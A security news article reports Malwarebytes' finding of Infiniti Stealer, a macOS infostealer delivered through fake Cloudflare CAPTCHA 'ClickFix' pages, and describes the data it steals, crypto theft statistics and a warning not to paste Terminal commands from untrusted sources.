A new and sophisticated threat is targeting macOS users, particularly those in the crypto and developer communities. Attackers are deploying a novel information stealer, dubbed Infiniti Stealer, by tricking victims with fake Cloudflare CAPTCHA pages into executing malicious commands. This malware is specifically designed to pilfer sensitive cryptocurrency wallet data and other critical credentials from Mac systems.
Security researchers at Malwarebytes uncovered this campaign, identifying the new infostealer as Infiniti Stealer. The malware is delivered through a “ClickFix” social engineering attack, a technique commonly seen on Windows but now adapted for macOS environments. This method convinces users to run harmful commands themselves, bypassing traditional security exploits.
The attack initiates with a deceptive CAPTCHA page, often resembling Cloudflare’s human verification, hosted on domains like update-check[.]com. After clicking the fake verification, users are instructed to open Terminal and paste a seemingly innocuous command. This command, however, is a hidden installer script that silently downloads and deploys Infiniti Stealer onto the Mac.
Once executed, the malware connects to a remote server to install itself without any user alerts or pop-ups. Infiniti Stealer is compiled into a native macOS binary using Nuitka, making it particularly challenging to analyze and detect. The infostealer is engineered to steal a wide array of data, including cryptocurrency wallet information, credentials from web browsers and the macOS Keychain, plaintext secrets from developer files, and even screenshots taken during its operation. It also incorporates anti-analysis checks to evade detection, sending stolen data to the attacker’s server with Telegram notifications upon completion.
The emergence of Infiniti Stealer highlights a growing trend of malware targeting macOS systems. Previously, in March 2026, security researchers noted the GhostClaw malware, which also aimed at macOS users to steal private keys and sensitive wallet data via malicious npm packages.The threat to personal crypto holdings is escalating significantly. According to blockchain intelligence firm Chainalysis, cryptocurrency theft reached over $3.4 billion in 2025. Personal wallet compromises have grown substantially, accounting for 44% of the total stolen value in 2024, up from just 7.3% in 2022. This indicates a critical shift towards targeting individual users.
As cybercriminals increasingly adapt sophisticated attack vectors like ClickFix for Apple machines, macOS systems are no longer immune to advanced malware. Therefore, crypto users and developers must exercise extreme caution when browsing the web. Never paste commands into Terminal from untrusted or unverified sources, as this remains a primary vector for self-initiated infections.
Follow Hashlytics on Bluesky, LinkedIn , Telegram and X to Get Instant Updates
